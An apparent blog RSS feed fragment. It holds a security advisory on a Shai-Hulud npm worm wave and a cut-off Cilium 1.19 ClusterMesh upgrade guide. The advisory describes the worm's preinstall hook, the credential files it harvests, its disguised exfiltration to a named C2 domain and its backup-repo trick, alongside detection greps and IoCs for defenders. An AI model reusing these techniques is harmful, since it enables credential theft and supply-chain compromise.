              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>The Shai-Hulud worm has been hitting npm in waves since the late-2025 TanStack incident. The core loop has not changed: compromise a maintainer, publish malicious patch versions with a <code>preinstall</code> script, harvest credentials, use the stolen npm tokens to spread to packages the victim maintains. What is new in the May 19 wave:</p>
<ul>
<li><strong>Carrier:</strong> the <code>atool</code> account. This account has publish rights across the AntV ecosystem, which means a single account compromise unlocked 10+ heavily-used charting packages plus several React glue libraries. The TanStack wave moved through a single namespace; this one fans out wider.</li>
<li><strong>Transport:</strong> the worm now ships a <code>bun run index.js</code> preinstall script. Bun executes faster than Node and tolerates more permissive parsing, so the payload runs cleanly on Bun-installing runners (which is most modern Node CI). The earlier waves used <code>node</code> or <code>npm run</code>. If your CI has Bun preinstalled (the default on a lot of GitHub Actions images now), it executes without a separate runtime install step.</li>
<li><strong>Crypto:</strong> payload upgraded from raw HTTPS POSTs to AES-256-GCM body with RSA-OAEP wrapping. The traffic now blends into OpenTelemetry trace submissions to <code>t.m-kosche.com</code>, which dodges the simple <code>egress to known-bad domain</code> SOC rules unless you also fingerprint the request shape.</li>
<li><strong>Persistence:</strong> the worm creates a public repository under the victim&#39;s GitHub account, with a Dune-themed naming pattern, and stores exfiltrated data as a JSON file in <code>results/</code>. This is a backup channel in case the direct HTTPS exfil is blocked, and it is a public-internet-readable copy of your stolen secrets until you find and delete the repo.</li>
</ul>
<p>The post-install behavior is otherwise the well-documented Shai-Hulud set: walk the file system for <code>.env</code>, <code>.npmrc</code>, <code>~/.aws/credentials</code>, <code>~/.docker/config.json</code>, <code>~/.kube/config</code>, SSH private keys, then walk environment variables for the usual CI tokens, then attempt to publish modified versions of any packages the stolen npm token can publish.</p>
<h2 id="h2-the-60-second-check-are-you-exposed" class="group relative scroll-mt-24">
        <a href="#h2-the-60-second-check-are-you-exposed" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The 60-second check: are you exposed
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-the-60-second-check-are-you-exposed"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Run this in every repo. It grep across all the common lockfile formats:</p>
<pre><code class="hljs language-bash">grep -rE <span class="hljs-string">&quot;(@antv/|echarts-for-react|\&quot;timeago\.js\&quot;|\&quot;size-sensor\&quot;|\&quot;canvas-nest\.js\&quot;|@lint-md/|@openclaw-cn/|@starmind/)&quot;</span> \
  --include=<span class="hljs-string">&quot;package.json&quot;</span> \
  --include=<span class="hljs-string">&quot;package-lock.json&quot;</span> \
  --include=<span class="hljs-string">&quot;pnpm-lock.yaml&quot;</span> \
  --include=<span class="hljs-string">&quot;bun.lock&quot;</span> \
  --include=<span class="hljs-string">&quot;yarn.lock&quot;</span> \
  -l
</code></pre><p>Zero matches: you are clear. Direct deps, transitive deps, and dev deps are all covered because they all end up resolved into the lockfile.</p>
<p>If you do hit a match, dig one level deeper to find the resolved version:</p>
<pre><code class="hljs language-bash"><span class="hljs-comment"># For npm / pnpm / Bun lockfiles</span>
grep -A2 -E <span class="hljs-string">&quot;(@antv/|echarts-for-react)&quot;</span> package-lock.json pnpm-lock.yaml bun.lock 2&gt;/dev/null

<span class="hljs-comment"># For Yarn classic</span>
grep -A2 -E <span class="hljs-string">&quot;(@antv/|echarts-for-react)&quot;</span> yarn.lock
</code></pre><p>Any version published between <strong>2026-05-19 01:56 UTC and 02:56 UTC</strong> is the malicious window. Older versions are clean. Versions published after Socket and npm pulled the malicious ones (early May 19) are also clean. If you installed during the window, assume compromise.</p>
<h2 id="h2-if-you-were-exposed-rotation-order" class="group relative scroll-mt-24">
        <a href="#h2-if-you-were-exposed-rotation-order" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          If you were exposed: rotation order
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-if-you-were-exposed-rotation-order"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>The worm runs as the CI user, so the credentials it reaches are everything the CI runner had access to. Rotate in this order. The order matters because some tokens can re-grant access to others.</p>
<ol>
<li><strong>npm publish tokens</strong> first. If any package you maintain was on the CI runner&#39;s auth, the worm has already tried to use it. Rotate via <code>npm token revoke</code> and re-issue, then audit <code>npm token list</code> for unknown tokens.</li>
<li><strong>GitHub Actions <code>GITHUB_TOKEN</code> and personal access tokens.</strong> Revoke at <code>github.com/settings/tokens</code>. If the worker created a public repo under your account, find and delete it (search your repos for names matching <code>&lt;dune&gt;-&lt;dune&gt;-&lt;digits&gt;</code> or the marker string <code>niagA oG eW ereH :duluH-iahS</code>).</li>
<li><strong>Cloud IAM keys</strong>: AWS, GCP, Azure. The worm reads <code>~/.aws/credentials</code>, <code>AWS_ACCESS_KEY_ID</code>, <code>AWS_SECRET_ACCESS_KEY</code>. Rotate via the cloud console; do not just edit the env var.</li>
<li><strong>Kubernetes service-account tokens.</strong> If the runner had a <code>KUBECONFIG</code>, that token can pull secrets from the cluster. Rotate the service account.</li>
<li><strong>Vault tokens.</strong> <code>VAULT_TOKEN</code> is in the targeted list. Revoke the token and audit the audit log for its recent use.</li>
<li><strong>SSH keys.</strong> The worm copies <code>~/.ssh/id_*</code> private keys. Rotate any key the CI runner had access to (deploy keys, signing keys).</li>
<li><strong>Anything in <code>.env</code> files on disk.</strong> If they were on the runner, they are gone. Rotate every credential listed.</li>
</ol>
<p>After rotation, audit GitHub for new repos under your org, npm for new versions on packages you own, and cloud logs for unusual API calls from unknown IPs in the past 24 hours.</p>
<h2 id="h2-indicators-of-compromise-to-feed-your-soc" class="group relative scroll-mt-24">
        <a href="#h2-indicators-of-compromise-to-feed-your-soc" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Indicators of compromise to feed your SOC
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-indicators-of-compromise-to-feed-your-soc"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Network egress to either of these is a red flag for the May 19 wave:</p>
<pre><code class="hljs language-text">t.m-kosche.com                 (primary C2, HTTPS port 443)
fulcio.sigstore.dev            (secondary endpoint, abuses sigstore)
rekor.sigstore.dev             (secondary endpoint, abuses sigstore)
</code></pre><p>The sigstore endpoints are legitimate services, which makes pure-domain alerting noisy. Pair the egress alert with the source: if a CI runner that normally does not touch sigstore suddenly POSTs there during a Node install, that is the pattern.</p>
<p>File-system markers on a runner that ran the payload:</p>
<pre><code class="hljs language-text">~/.cache/npm/_logs/                    (preinstall script left logs here)
/tmp/results-&lt;timestamp&gt;-&lt;counter&gt;.json  (staged exfil before HTTPS POST)
</code></pre><p>GitHub-side markers on the victim account:</p>
<pre><code class="hljs language-text">A new public repo named &lt;dune-word&gt;-&lt;dune-word&gt;-&lt;digits&gt;
  e.g. sayyadina-stillsuit-852, paul-fremen-1213, gurney-crysknife-49
Commit body containing: niagA oG eW ereH :duluH-iahS
File path: results/results-&lt;timestamp&gt;-&lt;counter&gt;.json
</code></pre><p>The Dune reference is the worm author&#39;s signature across waves. The reversed string decodes to <code>Shai-Hulud: Here We Go Again</code>. It is consistent enough that you can search your org-wide GitHub event log for it.</p>
<h2 id="h2-preventing-the-next-wave" class="group relative scroll-mt-24">
        <a href="#h2-preventing-the-next-wave" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Preventing the next wave
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-preventing-the-next-wave"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>This is the third Shai-Hulud wave in roughly six months. There is going to be a fourth. Defenses that actually move the needle:</p>
<ul>
<li><strong>Pin npm dependencies with <code>--save-exact</code></strong> and resolve transitives through a single lockfile per repo. Caret-pinning (<code>^1.2.3</code>) is what gets you auto-installed into the malicious window. Exact pins force a human to bump.</li>
<li><strong>Disable <code>preinstall</code> and <code>postinstall</code> scripts in CI</strong> with <code>npm config set ignore-scripts true</code> (or <code>--ignore-scripts</code> on the install command, or <code>enableScripts: false</code> in <code>.yarnrc.yml</code>). This breaks some legitimate packages that need a native build step, but those are usually a known short list you can opt back in for. The default should be off.</li>
<li><strong>Run installs in an ephemeral runner with no production credentials in env.</strong> GitHub Actions composite jobs make this practical: one job does <code>npm ci --ignore-scripts</code> against a hermetic cache, the next stage does the build, only the deploy stage has the real secrets. If a malicious preinstall fires, it sees nothing worth exfiltrating.</li>
<li><strong>Egress allowlist on CI runners.</strong> The default GitHub Actions runner can talk to the entire internet. An egress allowlist of registry.npmjs.org, github.com, your registry, and your deploy targets kills almost every supply-chain payload. Tools like Sysdig&#39;s egress policies, Step Security&#39;s harden-runner action, or a simple iptables rule in your self-hosted runner image all do this.</li>
<li><strong>npm token scoping.</strong> Use <code>--scope</code> and granular permissions. A token that can only publish <code>@your-org/foo</code> cannot be used by a worm to publish <code>@your-org/bar</code>. Audit <code>npm token list</code> regularly and prune.</li>
<li><strong>Watch for new repos under your org and your maintainer accounts.</strong> A Shai-Hulud-style worm cannot hide the repo it creates. A simple cron that diffs <code>gh repo list</code> against a known list will catch it within an hour.</li>
</ul>
<h2 id="h2-summary" class="group relative scroll-mt-24">
        <a href="#h2-summary" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Summary
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-summary"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>A new Shai-Hulud wave landed on npm at 01:56 UTC on May 19, 2026 through the compromised <code>atool</code> maintainer account. It published malicious patch versions of the entire AntV data-viz namespace plus <code>echarts-for-react</code>, <code>timeago.js</code>, <code>size-sensor</code>, <code>canvas-nest.js</code>, and a handful of <code>@lint-md</code>, <code>@openclaw-cn</code>, <code>@starmind</code> packages. The payload runs at install time via a <code>bun run index.js</code> preinstall hook, harvests cloud and CI credentials, exfiltrates them to <code>t.m-kosche.com</code> disguised as OpenTelemetry traces, and creates a public GitHub repo to stash a backup copy.</p>
<p>Run the grep above against every lockfile in your stack right now. If you have a match in the malicious window, rotate npm publish tokens first, then GitHub tokens, then cloud IAM, then service-account tokens, then SSH keys. After that, harden CI with <code>--ignore-scripts</code>, exact pins, and an egress allowlist so the next wave does not get the same easy ride.</p>
<h2 id="h2-source" class="group relative scroll-mt-24">
        <a href="#h2-source" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Source
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-source"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Socket&#39;s running disclosure: <a href="https://socket.dev/blog/antv-packages-compromised"><code>socket.dev/blog/antv-packages-compromised</code></a>. The page is updated as the investigation continues.</p>
]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[Cilium 1.19 ClusterMesh Policy Flip: The Silent Default That Will Drop Your Cross-Cluster Traffic]]></title>
      <link>https://devops-daily.com/posts/cilium-1-19-clustermesh-policy-flip</link>
      <description><![CDATA[Cilium 1.19 changed how network policies without a cluster selector resolve in a ClusterMesh. East/West traffic that 1.18 implicitly allowed is now silently dropped. Here is how to find every affected policy before you upgrade.]]></description>
      <pubDate>Mon, 18 May 2026 09:00:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/posts/cilium-1-19-clustermesh-policy-flip</guid>
      <category><![CDATA[Kubernetes]]></category>
      <author><![CDATA[DevOps Daily Team]]></author>
      <category><![CDATA[Kubernetes]]></category><category><![CDATA[Cilium]]></category><category><![CDATA[ClusterMesh]]></category><category><![CDATA[Network Policy]]></category><category><![CDATA[eBPF]]></category><category><![CDATA[Networking]]></category>
      <content:encoded><![CDATA[<p>The Cilium 1.19 changelog is long. Most of it is fine. One line tucked in the upgrade guide will quietly break ClusterMesh deployments that did not prepare for it: the policy-default-local-cluster flag is now on by default. Network policies that used to implicitly match endpoints across every connected cluster now match only the local cluster. East/West traffic that worked yesterday gets dropped today, with nothing in the policy you wrote to explain why.</p>
<p>This post is the pre-upgrade walkthrough. What changed, what concretely breaks, the <code>cilium clustermesh inspect-policy-default-local-cluster</code> command that lists every affected policy on your live 1.18 cluster, and the safe order to roll the upgrade. There is also a side-section on the new strict-encryption knobs in 1.19, since those are easy to misread as a default flip too.</p>
<h2 id="h2-tldr" class="group relative scroll-mt-24">
        <a href="#h2-tldr" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          TLDR
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-tldr"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><ul>
<li><strong>The silent break:</strong> <code>policy-default-local-cluster</code> defaults to <code>true</code> in 1.19. CiliumNetworkPolicies without an explicit <code>io.cilium.k8s.policy.cluster</code> selector now match only local-cluster endpoints. Implicit cross-cluster matches stop working.</li>
<li><strong>The fix is a pre-upgrade audit, not a code change.</strong> Run <code>cilium clustermesh inspect-policy-default-local-cluster --all-namespaces</code> on the 1.18 cluster. Treat the output as your migration TODO.</li>
<li><strong>The escape hatch:</strong> set <code>clustermesh.policyDefaultLocalCluster: false</code> in Helm during the upgrade window to keep 1.18 semantics while you migrate.</li>
<li><strong>Encryption strict mode is opt-in, not flipped.</strong> 1.19 adds a new ingress strict mode and renames the old egress keys. If your <code>values.yaml</code> still uses <code>encryption.strictMode.enabled</code>, that is now <code>encryption.strictMode.egress.enabled</code>. The deprecation warning today becomes a removal in 1.20.</li>
</ul>
<h2 id="h2-prerequisites" class="group relative scroll-mt-24">
        <a href="#h2-prerequisites" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Prerequisites
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-prerequisites"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><ul>
<li>A Cilium ClusterMesh between two or more Kubernetes clusters, currently on 1.18.x.</li>
<li>Cluster-admin RBAC on each cluster.</li>
<li><code>cilium</code> CLI v0.16+ installed locally (the inspect command landed alongside the 1.19 release).</li>
<li>Hubble running. If you don&#39;t run Hubble in production, this upgrade is a good reason to start; the validation steps below depend on it.</li>
</ul>
<h2 id="h2-what-actually-changed-in-119" class="group relative scroll-mt-24">
        <a href="#h2-what-actually-changed-in-119" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What actually changed in 1.19
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-what-actually-changed-in-119"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Two unrelated things people are conflating. Take them one at a time.</p>
<h3 id="h3-1-clustermesh-policy-default-the-silent-break-one" class="group relative scroll-mt-24">
        <a href="#h3-1-clustermesh-policy-default-the-silent-break-one" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          1. ClusterMesh policy default (the silent-break one)
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-1-clustermesh-policy-default-the-silent-break-one"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>From the 1.19 upgrade guide:</p>
<blockquote>
<p>Cilium network policies used to implicitly select endpoints from all the clusters. Cilium 1.18 introduced a new option called <code>policy-default-local-cluster</code> which will be set by default in Cilium 1.19.</p>
</blockquote>
<p>And from the 1.19.0 release notes:</p>
<blockquote>
<p>When network policy selectors don&#39;t explicitly define a cluster for communication to be allowed, they will now default to only allowing the local cluster.</p>
</blockquote>
<p>The mechanic: before 1.19, a <code>fromEndpoints</code> selector like</p>
<pre><code class="hljs language-yaml"><span class="hljs-attr">fromEndpoints:</span>
  <span class="hljs-bullet">-</span> <span class="hljs-attr">matchLabels:</span>
      <span class="hljs-attr">app:</span> <span class="hljs-string">web</span>
</code></pre><p>matched every pod labelled <code>app: web</code> in every cluster in the mesh. After 1.19 (with the default), it matches only pods in the local cluster. To preserve the old semantics you have to be explicit:</p>
<pre><code class="hljs language-yaml"><span class="hljs-attr">fromEndpoints:</span>
  <span class="hljs-bullet">-</span> <span class="hljs-attr">matchLabels:</span>
      <span class="hljs-attr">app:</span> <span class="hljs-string">web</span>
      <span class="hljs-attr">io.cilium.k8s.policy.cluster:</span> <span class="hljs-string">&quot;*&quot;</span>     <span class="hljs-comment"># all clusters in the mesh</span>
<span class="hljs-comment"># or</span>
<span class="hljs-attr">fromEndpoints:</span>
  <span class="hljs-bullet">-</span> <span class="hljs-attr">matchLabels:</span>
      <span class="hljs-attr">app:</span> <span class="hljs-string">web</span>
      <span class="hljs-attr">io.cilium.k8s.policy.cluster:</span> <span class="hljs-string">cluster-east</span>
</code></pre><p>This change is a security improvement. Implicit cross-cluster trust was a frequent source of &quot;we didn&#39;t realize that policy reached the staging cluster.&quot; But for clusters that intentionally relied on it for legitimate East/West traffic, the upgrade silently severs the path. PR <code>cilium/cilium#40609</code>.</p>
<h3 id="h3-2-encryption-strict-modes-new-knobs-not-a-default-flip" class="group relative scroll-mt-24">
        <a href="#h3-2-encryption-strict-modes-new-knobs-not-a-default-flip" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          2. Encryption strict modes (new knobs, not a default flip)
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-2-encryption-strict-modes-new-knobs-not-a-default-flip"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>The release-note line that has been getting misread:</p>
<blockquote>
<p>Encryption Strict Modes: Both IPsec and WireGuard transparent encryption modes now support a &quot;strict mode&quot; to require traffic to be encrypted between nodes. Unencrypted traffic will be dropped in this mode.</p>
</blockquote>
<p>Three actual changes here, none of which flip on by default:</p>
<ol>
<li>A new <strong>ingress</strong> strict mode was added. Previous releases only had an egress strict mode. Flag: <code>--enable-encryption-strict-mode-ingress</code>. Helm: <code>encryption.strictMode.ingress.enabled</code>.</li>
<li>IPsec strict mode was generalized from WireGuard, so the same strict-mode semantics now exist for both transports. PR <code>#42115</code>.</li>
<li>The pre-existing egress strict-mode Helm keys were <strong>renamed</strong>. <code>encryption.strictMode.enabled</code> is deprecated in favor of <code>encryption.strictMode.egress.enabled</code>. The old keys still work in 1.19 with a warning. They are scheduled for removal in 1.20.</li>
</ol>
<p>If you are not running strict mode today, this section does not change anything for you on upgrade. If you are, you have a <code>values.yaml</code> rename to do. Either way, do not enable strict ingress and the ClusterMesh policy migration in the same change window.</p>
<h2 id="h2-what-concretely-breaks-on-a-naive-helm-upgrade" class="group relative scroll-mt-24">
        <a href="#h2-what-concretely-breaks-on-a-naive-helm-upgrade" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What concretely breaks on a naive helm upgrade
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-what-concretely-breaks-on-a-naive-helm-upgrade"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><table>
<thead>
<tr>
<th>Surface</th>
<th>Behavior post-upgrade</th>
</tr>
</thead>
<tbody><tr>
<td>ClusterMesh East/West traffic with implicit selectors</td>
<td>Dropped at policy enforcement. Hubble shows <code>verdict: DROPPED, type: policy-verdict</code>.</td>
</tr>
<tr>
<td>Existing strict-mode encryption with old Helm keys</td>
<td>Still works, emits deprecation warning. Will break on 1.20.</td>
</tr>
<tr>
<td>Mutual Authentication</td>
<td>Now disabled by default. Re-enable explicitly if you depend on it.</td>
</tr>
<tr>
<td><code>CiliumBGPPeeringPolicy</code> v1 API</td>
<td>Removed. Migrate to <code>cilium.io/v2</code> before upgrading.</td>
</tr>
<tr>
<td>Kafka L7 policy, <code>ToRequires</code>, <code>FromRequires</code></td>
<td>Deprecated. Surfaces as warnings, no behavior change yet.</td>
</tr>
<tr>
<td>Host-network pods</td>
<td>Unchanged, unless you also enable ingress strict mode.</td>
</tr>
</tbody></table>
<p>The only line in that table that silently breaks a naive upgrade is the first one. Everything else either preserves behavior (deprecation warnings), is opt-in (strict ingress), or is a known API removal (BGP v1) that surfaces loudly.</p>
<h2 id="h2-pre-flight-on-the-live-118-cluster" class="group relative scroll-mt-24">
        <a href="#h2-pre-flight-on-the-live-118-cluster" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Pre-flight on the live 1.18 cluster
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-pre-flight-on-the-live-118-cluster"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>The command that matters:</p>
<pre><code class="hljs language-bash">cilium clustermesh inspect-policy-default-local-cluster --all-namespaces
</code></pre><p>This walks every CiliumNetworkPolicy in the cluster, identifies selectors that would implicitly match across clusters in 1.18, and lists them. The output is your migration TODO. You will not get a second chance to run it after upgrade, because once you are on 1.19 the implicit matches no longer exist to inspect.</p>
<p>For each policy in the output, decide:</p>
<ul>
<li><strong>The cross-cluster match was intentional.</strong> Add <code>io.cilium.k8s.policy.cluster: &quot;*&quot;</code> to the selector, or list the specific cluster names. Keep behavior identical post-upgrade.</li>
<li><strong>The cross-cluster match was accidental.</strong> Do nothing. 1.19 will tighten the policy to local-only, which is what you wanted anyway.</li>
</ul>
<p>If your audit produces a list you can&#39;t finish in a maintenance window, set the escape hatch:</p>
<pre><code class="hljs language-yaml"><span class="hljs-comment"># values.yaml on the upgrade</span>
<span class="hljs-attr">clustermesh:</span>
  <span class="hljs-attr">policyDefaultLocalCluster:</span> <span class="hljs-literal">false</span>   <span class="hljs-comment"># keep 1.18 semantics for one release</span>
</code></pre><p>This is a one-release stay of execution. You upgrade to 1.19, run with 1.18 policy semantics, finish migrating the policies, then flip <code>policyDefaultLocalCluster: true</code> and validate. Don&#39;t let it sit there past one release.</p>
<h2 id="h2-detecting-drops-with-hubble" class="group relative scroll-mt-24">
